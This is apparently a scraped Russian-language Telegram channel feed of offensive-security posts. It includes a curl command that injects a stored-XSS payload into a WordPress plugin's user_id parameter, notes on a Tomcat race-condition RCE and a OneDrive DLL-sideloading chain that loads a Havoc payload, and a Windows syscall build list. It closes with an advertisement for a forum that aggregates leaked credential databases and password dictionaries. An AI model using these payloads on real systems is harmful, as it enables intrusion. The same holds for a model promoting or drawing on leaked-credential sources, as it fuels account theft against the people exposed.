This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-50379 Apache Tomcat
*
Проблема с состоянием гонки времени проверки времени использования (
*
Exploitation and POC
*
Проблема с состоянием гонки времени проверки времени использования (
TOCTOU), которое может привести к удаленному выполнению кода (RCE), особенно в файловых системах, нечувствительных к регистру, таких как Windows.*
Exploitation and POC
👍15🔥5
CVE-2024-10793
*
Плагин WP Activity Log для
Хранимая XSS через параметр user_id во всех версиях до 5.2.1
*
Плагин WP Activity Log для
WordPressХранимая XSS через параметр user_id во всех версиях до 5.2.1
curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
-d 'action=destroy-sessions&user_id=<noscript>alert("XSS found 1")</noscript>'
🔥13😱5👍2
Отлично ))))
onedrive.exe загружает подделанный sppc.dll, который, в свою очередь, загружает onedrive.dll и расшифровывает его с помощью системной функции RC4033 и жестко запрограммированного ключа. Расшифрованная полезная нагрузка, похоже, связана с havoc🔥20😱15
Syscall tables
*
*
Link
*
Windows 2003 SP2 build 3790 also Windows XP 64;
Windows Vista RTM build 6000;
Windows Vista SP2 build 6002;
Windows 7 SP1 build 7601;
Windows 8 RTM build 9200;
Windows 8.1 build 9600;
Windows 10 TP build 10061;
Windows 10 TH1 build 10240;
Windows 10 TH2 build 10586;
Windows 10 RS1 build 14393;
Windows 10 RS2 build 15063;
Windows 10 RS3 build 16299;
Windows 10 RS4 build 17134;
Windows 10 RS5 build 17763;
Windows 10 19H1 build 18362;
Windows 10 19H2 build 18363;
Windows 10 20H1 build 19041; * Note that 19042, 19043, 19044, 19045 are the same as 19041
Windows Server 2022 build 20348;
Windows 11 21H2 build 22000;
Windows 11 22H2 build 22621;
Windows 11 23H2 build 22631;
Windows 11 24H2 build 26120;
Windows 11 25H2 build 27686;
Windows 11 25H2 build 27695;
Windows 11 25H2 build 27723;
Windows 11 25H2 build 27729.
*
Link
👍13🔥2
duty-free.cc - место встречи профессионалов. Поиск пентестестеров, специалистов любого рода шляп🎩
Вот что вы можете найти на нашем форуме🔍
- Агрегатор утечек баз данных (email:pass, email:hash, url;log;pass, login:pass, словари с паролями)💻
- Статьи/заметки по пентесту сеток, внутрянок, веба с практическими примерами
Данный стартап был создан благодаря профессионалами на русскоязычном рынке
posterman(luna11) и Comedy
Суммарный депозит на xss и эксплоит более 20 млн. рублей💸
#pentest #пентест #xss_is #exploit_in
группа в ТГ - duty-free.cc
Вот что вы можете найти на нашем форуме🔍
- Агрегатор утечек баз данных (email:pass, email:hash, url;log;pass, login:pass, словари с паролями)💻
- Статьи/заметки по пентесту сеток, внутрянок, веба с практическими примерами
Данный стартап был создан благодаря профессионалами на русскоязычном рынке
posterman(luna11) и Comedy
Суммарный депозит на xss и эксплоит более 20 млн. рублей💸
#pentest #пентест #xss_is #exploit_in
группа в ТГ - duty-free.cc
😱11🔥8👍6